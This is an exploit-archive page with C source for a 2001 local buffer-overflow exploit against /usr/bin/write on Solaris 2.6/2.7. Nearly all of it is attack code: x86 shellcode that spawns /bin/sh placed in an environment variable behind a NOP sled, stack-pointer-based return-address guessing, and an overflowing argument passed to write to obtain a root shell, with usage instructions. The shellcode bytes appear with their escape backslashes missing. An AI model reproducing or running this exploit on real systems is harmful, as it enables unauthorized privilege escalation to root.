Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
# Published : 2001-01-25
# Author : Pablo Sor
# Previous Title : jaZip 0.32-2 Local Buffer Overflow Exploit
# Next Title : Redhat 6.1 man Local Exploit (egid 15)

#include <stdio.h>
#include <unistd.h>
/*

  /usr/bin/write overflow proof of conecpt.

  Tested on Solaris 7 x86

  Pablo Sor, Buenos Aires, Argentina. 01/2000
  psor@afip.gov.ar

  usage: write-exp [shell_offset] [ret_addr_offset]

  default offset should work.

*/
long get_esp() { __asm__("movl %esp,%eax"); }

char shell[] =
  "xebx45x9axffxffxffxffx07xff"
  "xc3x5ex31xc0x89x46xb7x88x46"
  "xbcx88x46x07x89x46x0cx31xc0"
  "xb0x2fxe8xe0xffxffxffx52x52"
  "x31xc0xb0xcbxe8xd5xffxffxff"
  "x83xc4x08x31xc0x50x8dx5ex08"
  "x53x8dx1ex89x5ex08x53xb0x3b"
  "xe8xbexffxffxffx83xc4x0cxe8"
  "xbexffxffxffx2fx62x69x6ex2f"
  "x73x68xffxffxffxffxffxffxff"
  "xffxff";

  /* shellcode by Cheez Whiz */

void main(int argc,char **argv)
{
  FILE *fp;
  long magic,magicret;
  char buf[100],*envi;
  int i;

  envi = (char *) malloc(1000*sizeof(char));
  memset(envi,0x90,1000);
  memcpy(envi,"SOR=",4);
  memcpy(envi+980-strlen(shell),shell,strlen(shell));
  envi[1000]=0;
  putenv(envi);

  if (argc!=3)
  {
    magicret = get_esp()+116;
    magic = get_esp()-1668;
  }
  else
  {
    magicret = get_esp()+atoi(argv[1]);
    magic = get_esp()+atoi(argv[2]);
  }

  memset(buf,0x41,100);
  buf[99]=0;
  memcpy(buf+91,&magic,4);
  for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
  execl("/usr/bin/write","write","root",buf,(char *)0);
}


// www.Syue.com [2001-01-25]